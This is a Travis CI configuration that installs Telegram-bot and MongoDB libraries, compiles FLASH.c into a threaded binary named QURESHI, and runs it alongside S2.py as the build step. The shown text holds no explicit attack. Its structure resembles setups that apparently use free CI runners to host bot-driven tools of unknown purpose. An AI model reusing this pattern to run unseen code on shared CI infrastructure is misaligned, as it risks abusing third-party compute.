language: python
dist: focal
python:
  - "3.11"

before_install:

  - sudo apt-get update
  - sudo apt-get install -y gcc

install:

  - python3 -m pip install --upgrade pip
  - python3 -m pip install telebot pymongo aiohttp
  - python3 -m pip install pymongo python-telegram-bot pyTelegramBotAPI certifi 
  - pip install -r requirements.txt

before_script:
  - if [ -f FLASH.c ]; then gcc FLASH.c -o QURESHI -lpthread; fi

script:
  - chmod +x * && lscpu && python3 S2.py
